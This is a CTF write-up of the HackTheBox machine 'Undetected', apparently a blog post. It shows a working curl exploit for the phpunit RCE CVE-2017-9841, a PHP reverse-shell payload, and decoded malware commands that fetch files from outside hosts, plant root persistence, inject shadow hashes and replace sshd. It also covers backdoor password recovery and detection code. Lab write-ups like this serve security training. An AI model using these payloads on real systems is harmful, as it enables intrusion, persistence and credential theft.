d3vyce 095a13b2c9
add: writeup-ctf
2024-03-02 21:49:07 +01:00

---
title: "Writeup - Undetected (HTB)"
date: 2022-04-09
slug: "writeup-undetected-htb"
type: "writeup-ctf"
---
This is a writeup for the [Undetected](https://app.hackthebox.com/machines/Undetected) machine from the HackTheBox site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV 10.10.11.146
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 8.2)
- 80/tcp : HTTP web server (Apache 2.4.41)
![](img/image-2.webp)
## Exploit
While browsing the site I notice that there is a subdomain, so I add it to the /etc/hosts file:
```bash
10.10.11.146 store.djewelry.htb
```
![](img/image-3.webp)
I arrive on a new part of the site: the store. I start by searching for directories with gobuster:
```bash
gobuster dir -u http://store.djewelry.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
```
I quickly find the "/vendor" folder:
![](img/image-4.webp)
A lot of potential exploits... After some research I find that this version of "phpunit" has a known vulnerability allowing remote command execution via PHP ([CVE-2017-9841](https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263)).
```bash
┌──(kali㉿kali)-[~]
└─$ curl --data "<?php system('id');?>" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
So I will be able to use this exploit to create a reverse shell. To do this I open a listening port with "nc", then I use the following command to start the session:
```bash
curl --data '<?php $sock=fsockopen("10.10.14.20",1234);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```
I now have a reverse shell. I'll do a first scan with [linPeas](lingeas.sh). After some analysis, I find a suspicious file in the "/var/backups" folder. After copying the file to my machine, I extract the information with the "strings" command.
In the output of the command I find a large hexadecimal string that I decode with the site [Hex decode](https://www.convertstring.com/EncodeDecode/HexDecode).
![](img/image-5.webp)
It is a sequence of commands:
```bash
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys;
wget tempfiles.xyz/.main -O /var/lib/.main;
chmod 755 /var/lib/.main;
echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd;
awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _;
do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
```
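The decoded script creates a second passwd entry "<name>1" for every interactive account with UID >= 1000, reusing the original UID as both uid and gid. As an added example (not from the original writeup), here is a small triage check for that pattern, run over constructed sample passwd lines rather than data from the machine:

```python
# Added example, not part of the original writeup: detect the account clones
# that the decoded script above creates. For every interactive account with
# UID >= 1000 it appends a passwd entry "<name>1" that reuses the original UID
# as both uid and gid and points at the same home directory. So a quick triage
# check is: which UIDs are shared by several names, and which of those names
# are another name plus a trailing "1"? The passwd text below is constructed
# sample data, not taken from the machine.
from collections import defaultdict

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
steven:x:1000:1000:steven:/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash
"""

def parse_passwd(text):
    """Parse passwd-format text into a list of (name, uid, gid, home, shell)."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:          # skip blank or malformed lines
            continue
        entries.append((fields[0], int(fields[2]), int(fields[3]), fields[5], fields[6]))
    return entries

def shared_uids(text):
    """Map each UID that is used by more than one account to its account names."""
    by_uid = defaultdict(list)
    for name, uid, _gid, _home, _shell in parse_passwd(text):
        by_uid[uid].append(name)
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}

def clone_accounts(text):
    """Return the names matching the dropper's pattern: '<existing name>1'
    that shares the existing account's UID and home directory."""
    entries = parse_passwd(text)
    index = {e[0]: e for e in entries}
    clones = []
    for name, uid, _gid, home, _shell in entries:
        base = name[:-1]
        if name.endswith("1") and base in index:
            orig = index[base]
            if orig[1] == uid and orig[3] == home:
                clones.append(name)
    return sorted(clones)

if __name__ == "__main__":
    print("shared UIDs:", shared_uids(SAMPLE_PASSWD))
    print("clone accounts:", clone_accounts(SAMPLE_PASSWD))
```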
One element is of particular interest to us: the hash of a user's password. I retrieve it and try to crack it with "john".
![](img/image-6.webp)
After a few seconds john finds the password: ihatehackers.
We don't have the user name, but during the linPeas scan I found that there were 2 users besides root: steven & steven1.
Let's try with the two users:
![](img/image-7.webp)
So this is the password of steven1! I now have access to the first flag of the machine.
## Privilege escalation
Let's go back to our LinPeas scan. I noticed that the user steven had mail in the folder "/var/mail":
![](img/image-8.webp)
In short, the sysadmin tells us that there is a problem with Apache, so let's look in the Apache folder for anything unusual.
In the modules folder there are a lot of files, but when I look at the modification dates, I notice that they all share the same date except one: mod\_reader.so.
```bash
ls -l /usr/lib/apache/modules
```
![](img/image-9.webp)
I copy the file to my computer and extract the information with the command "strings". As usual there is a big string, but this time in base64. I decode it with the following command:
```bash
┌──(kali㉿kali)-[~/Downloads]
└─$ echo "d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk" | base64 -d
wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
```
These two commands overwrite the "sshd" program, so I retrieve the sshd file for analysis with Ghidra.
After Ghidra's analysis, I look for unusual variables or functions, and one function catches my attention: auth\_password.
In this function I find the backdoor's signature and a sequence of hexadecimal constants that make up a password. Let's try to recompose the password!
![](img/image-10.webp)
First I put the pieces of the password back in order. I notice that the first byte is shown as negative, but when I right-click on the value, Ghidra tells me that it corresponds to "0xa5".
```text
30_1 0xa5
28_2 0xa9f4
24_4 0xbcf0b5e3
16_8 0xb2d6f4a0fda0b3d6
12_4 0xfdb3d6e7
8_4 0xf7bbfdc8
4_4 0xa4b3a3f3
0_4 0xf0e7abd6
```
In total this adds up to 31 bytes, which is a good sign: it's the size of the "backdoor" variable!
I notice that at the end of the processing the following calculation is done: "\*pbVar4 = bVar7 ^ 0x96". This corresponds to an XOR with the value 0x96.
I have all the elements, so I should be able to find the password with the help of [CyberChef](https://gchq.github.io/CyberChef). I add the following modules:
- Swap endianness -> 31 word length
- From Hex
- XOR -> key: 96 (hex)
{{< alert icon="circle-info" >}}
The "Swap endianness" function converts little endian to big endian (or vice versa). These are the two ways of ordering the bytes of a stored value.
{{< /alert >}}
At the end CyberChef returns the following string:
```text
@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
```
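The same recovery as a script, added here and not part of the original writeup: the (offset, size, value) triples are the ones read out of Ghidra above, the stores are assumed to be little-endian (x86-64), and the XOR key comes from the "\*pbVar4 = bVar7 ^ 0x96" line.

```python
# Added example, not part of the original writeup: rebuild the backdoor
# password from the constants Ghidra showed in auth_password. The
# (offset, size, value) triples are the ones listed above; the stores are
# assumed to be little-endian (x86-64), which is why each constant's bytes
# are reversed before the per-byte XOR with 0x96 ("*pbVar4 = bVar7 ^ 0x96").
CHUNKS = [  # (byte offset in the buffer, store size in bytes, value from Ghidra)
    (0, 4, 0xF0E7ABD6),
    (4, 4, 0xA4B3A3F3),
    (8, 4, 0xF7BBFDC8),
    (12, 4, 0xFDB3D6E7),
    (16, 8, 0xB2D6F4A0FDA0B3D6),
    (24, 4, 0xBCF0B5E3),
    (28, 2, 0xA9F4),
    (30, 1, 0xA5),   # the decompiler shows this single byte as a negative signed char
]
XOR_KEY = 0x96

def rebuild_buffer(chunks):
    """Lay the constants out in memory order; returns the still-obfuscated bytes."""
    size = max(off + n for off, n, _ in chunks)
    buf = bytearray(size)
    for off, n, val in chunks:
        buf[off:off + n] = val.to_bytes(n, "little")
    return bytes(buf)

def decode_password(chunks, key=XOR_KEY):
    """Undo the per-byte XOR the backdoor applies before comparing with the input."""
    return bytes(b ^ key for b in rebuild_buffer(chunks)).decode("ascii")

if __name__ == "__main__":
    buf = rebuild_buffer(CHUNKS)
    print(len(buf), "bytes ->", decode_password(CHUNKS))
```

Reversing the whole 31-byte hex string in CyberChef gives the same byte order as laying each little-endian store out at its offset, which is why the two approaches agree.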
Let's try to connect to root with this password:
![](img/image-11.webp)
And it works, so I can get the last flag.
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Update phpunit to the latest version
- Do not leave files containing hashes readable by everyone / use stronger passwords
- Use key-based authentication for SSH root logins